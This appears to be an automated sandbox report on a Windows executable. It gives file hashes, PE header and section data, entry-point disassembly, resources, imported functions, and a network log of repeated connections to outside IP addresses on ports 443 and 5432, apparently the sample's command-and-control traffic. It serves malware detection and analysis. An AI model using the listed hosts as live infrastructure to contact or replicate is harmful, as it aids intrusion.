                                                              SSDEEP:24576:FQH4MilLLfPSJOAc3ErwoD/k9wokidQrlVSP0p+vMiZOVDtplF:m5KL30OA0ONyw5iqpNUONtx
                                                              TLSH:8E75E026BEA18532D21362F94C3B26949C387D502D24E41BFADC2F4E4EE73ED60552B7
                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                              Icon Hash:c1692e1f373f1307
                                                              Entrypoint:0x455008
                                                              Entrypoint Section:CODE
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                              DLL Characteristics:
                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:9bb8895146d718c20e7648238aa35ab2
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              add esp, FFFFFFF0h
                                                              mov eax, 00454D10h
                                                              call 00007F6580B1DA05h
                                                              mov eax, dword ptr [0045772Ch]
                                                              mov eax, dword ptr [eax]
                                                              call 00007F6580B6745Dh
                                                              mov ecx, dword ptr [00457874h]
                                                              mov eax, dword ptr [0045772Ch]
                                                              mov eax, dword ptr [eax]
                                                              mov edx, dword ptr [004546ACh]
                                                              call 00007F6580B6745Dh
                                                              mov eax, dword ptr [0045772Ch]
                                                              mov eax, dword ptr [eax]
                                                              call 00007F6580B674D1h
                                                              call 00007F6580B1BB28h
                                                              lea eax, dword ptr [eax+00h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x590000x1fac.idata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x12a000.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x66f8.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x5c0000x18.rdata
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              CODE0x10000x540500x54200b8f784e44289a42ef6bb30b4a9671c83False0.5270245170876672data6.4960464798819855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              DATA0x560000x19040x1a00746a88ddd285549406ed3603bd368505False0.44275841346153844data4.423901223624386IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              BSS0x580000xe4d0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .idata0x590000x1fac0x200052429d80df4cb26cd124aa659794cedaFalse0.369873046875data5.013391179853796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .tls0x5b0000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rdata0x5c0000x180x2007bf35113e8d51f0b7aa5e0d4cdb423caFalse0.048828125data0.2005819074398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                              .reloc0x5d0000x66f80x6800746e00abda79f4a657da325856f6646fFalse0.5968299278846154data6.637731795985165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                              .rsrc0x640000x12a0000x12a00058640219fcb1b9773466212053a2da05False0.7567818660864094data7.365288168670157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_CURSOR0x6501c0x134data0.237012987012987
                                                              RT_CURSOR0x651500x134data0.4642857142857143
                                                              RT_CURSOR0x652840x134data0.4805194805194805
                                                              RT_CURSOR0x653b80x134data0.38311688311688313
                                                              RT_CURSOR0x654ec0x134data0.36038961038961037
                                                              RT_CURSOR0x656200x134data0.4090909090909091
                                                              RT_CURSOR0x657540x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                              RT_CURSOR0x658880x134data0.21103896103896103
                                                              RT_CURSOR0x659bc0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                              RT_BITMAP0x65af00xd8Device independent bitmap graphic, 14 x 14 x 4, image size 1120.4027777777777778
                                                              RT_BITMAP0x65bc80xd8Device independent bitmap graphic, 14 x 14 x 4, image size 1120.4027777777777778
                                                              RT_BITMAP0x65ca00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                              RT_BITMAP0x65e700x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                              RT_BITMAP0x660540x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                              RT_BITMAP0x662240x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                              RT_BITMAP0x663f40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                              RT_BITMAP0x665c40x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                              RT_BITMAP0x667940x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                              RT_BITMAP0x669640x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                              RT_BITMAP0x66b340x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                              RT_BITMAP0x66d040x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                              RT_BITMAP0x66ed40xe0Device independent bitmap graphic, 15 x 15 x 4, image size 1200.36160714285714285
                                                              RT_BITMAP0x66fb40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.3103448275862069
                                                              RT_BITMAP0x6709c0xe0Device independent bitmap graphic, 15 x 15 x 4, image size 1200.39732142857142855
                                                              RT_BITMAP0x6717c0xe0Device independent bitmap graphic, 15 x 15 x 4, image size 1200.4330357142857143
                                                              RT_BITMAP0x6725c0xd8Device independent bitmap graphic, 14 x 14 x 4, image size 1120.39814814814814814
                                                              RT_BITMAP0x673340xd8Device independent bitmap graphic, 14 x 14 x 4, image size 1120.3888888888888889
                                                              RT_BITMAP0x6740c0x84Device independent bitmap graphic, 7 x 7 x 4, image size 280.5681818181818182
                                                              RT_BITMAP0x674900x84Device independent bitmap graphic, 7 x 7 x 4, image size 280.5681818181818182
                                                              RT_BITMAP0x675140xe0Device independent bitmap graphic, 15 x 15 x 4, image size 1200.45089285714285715
                                                              RT_BITMAP0x675f40xe0Device independent bitmap graphic, 15 x 15 x 4, image size 120, resolution 3780 x 3780 px/m0.53125
                                                              RT_BITMAP0x676d40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                              RT_BITMAP0x677bc0xe0Device independent bitmap graphic, 15 x 15 x 4, image size 1200.4375
                                                              RT_BITMAP0x6789c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.34051724137931033
                                                              RT_ICON0x679840x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5013440860215054
                                                              RT_ICON0x67c6c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.311841949603691
                                                              RT_DIALOG0x784940x52data0.7682926829268293
                                                              RT_STRING0x784e80x244data0.4379310344827586
                                                              RT_STRING0x7872c0x3c4data0.33713692946058094
                                                              RT_STRING0x78af00x2c4data0.4392655367231638
                                                              RT_STRING0x78db40x288data0.4567901234567901
                                                              RT_STRING0x7903c0x1ecdata0.3516260162601626
                                                              RT_STRING0x792280x148data0.5548780487804879
                                                              RT_STRING0x793700x274data0.44904458598726116
                                                              RT_STRING0x795e40x178data0.5585106382978723
                                                              RT_STRING0x7975c0xe8data0.5991379310344828
                                                              RT_STRING0x798440x154data0.5441176470588235
                                                              RT_STRING0x799980x498data0.37755102040816324
                                                              RT_STRING0x79e300x354data0.3908450704225352
                                                              RT_STRING0x7a1840x3e8data0.33
                                                              RT_STRING0x7a56c0x234data0.475177304964539
                                                              RT_STRING0x7a7a00xecdata0.5508474576271186
                                                              RT_STRING0x7a88c0x1b4data0.5206422018348624
                                                              RT_STRING0x7aa400x3e4data0.32028112449799195
                                                              RT_STRING0x7ae240x358data0.4158878504672897
                                                              RT_STRING0x7b17c0x2b4data0.4060693641618497
                                                              RT_RCDATA0x7b4300x10data1.5
                                                              RT_RCDATA0x7b4400x112334dataEnglishUnited States0.8041696548461914
                                                              RT_RCDATA0x18d7740x46cdata0.6607773851590106
                                                              RT_RCDATA0x18dbe00x21bDelphi compiled form 'Tplfb'0.62152133580705
                                                              RT_GROUP_CURSOR0x18ddfc0x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                              RT_GROUP_CURSOR0x18de100x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_CURSOR0x18de240x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_CURSOR0x18de380x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                              RT_GROUP_CURSOR0x18de4c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_CURSOR0x18de600x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_CURSOR0x18de740x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_CURSOR0x18de880x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_CURSOR0x18de9c0x14Lotus unknown worksheet or configuration, revision 0x11.3
                                                              RT_GROUP_ICON0x18deb00x14dataEnglishUnited States1.2
                                                              RT_GROUP_ICON0x18dec40x14dataEnglishUnited States1.25
                                                              DLLImport
                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                              kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetPixel, GetPaletteEntries, GetObjectType, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                              user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                              kernel32.dllSleep
                                                              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                              Language of compilation systemCountry where language is spokenMap
                                                              EnglishUnited States
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Jul 3, 2024 02:22:19.394881010 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:19.394923925 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:19.395001888 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:19.404840946 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:19.404863119 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.023930073 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.024126053 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.029237986 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.029253960 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.029494047 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.029546976 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.090017080 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.136495113 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.290682077 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.290719032 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.290730953 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.290745974 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.290757895 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.290771961 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.290797949 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.290802956 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.290843964 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.297883987 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.298319101 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.298327923 CEST44349161149.154.167.99192.168.2.22
                                                              Jul 3, 2024 02:22:20.298357010 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.298388958 CEST49161443192.168.2.22149.154.167.99
                                                              Jul 3, 2024 02:22:20.321471930 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:20.326558113 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:20.326725006 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:20.327032089 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:20.332139969 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:21.046699047 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:21.046749115 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:21.047014952 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:21.047049999 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:21.060034990 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:21.065090895 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:21.258761883 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:21.258824110 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:22.661619902 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:22.666472912 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:23.129015923 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:23.129132032 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.132035017 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.136910915 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:23.136989117 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.137300014 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.142102003 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:23.815804005 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:23.819911957 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.830684900 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.834450006 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:23.835601091 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:23.839385986 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:24.478014946 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:24.478229046 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:24.480384111 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:24.485543013 CEST543249162116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:24.485599995 CEST491625432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:24.497312069 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:24.502118111 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:24.502207994 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:24.502475023 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:24.507241011 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.157833099 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.157944918 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.158782959 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.160373926 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.163614035 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.165150881 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.818648100 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.818660975 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.818837881 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.819789886 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.820115089 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.824911118 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.824966908 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.824991941 CEST543249164116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:25.825036049 CEST491645432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.825376987 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:25.830156088 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:26.487142086 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:26.487298965 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:26.487937927 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:26.489613056 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:26.498239040 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:26.501107931 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.161887884 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.161942959 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.161951065 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.162035942 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.162045956 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.162051916 CEST543249166116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.162094116 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.162094116 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.162180901 CEST491665432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.163070917 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.168128014 CEST543249165116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.168179989 CEST491655432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.177336931 CEST491675432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.182142973 CEST543249167116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.182243109 CEST491675432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.182579994 CEST491675432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.187428951 CEST543249167116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.866096973 CEST543249167116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.866302967 CEST491675432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.866899967 CEST491675432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.868452072 CEST491675432192.168.2.22116.202.180.70
                                                              Jul 3, 2024 02:22:27.871735096 CEST543249167116.202.180.70192.168.2.22
                                                              Jul 3, 2024 02:22:27.873332024 CEST543249167116.202.180.70192.168.2.22
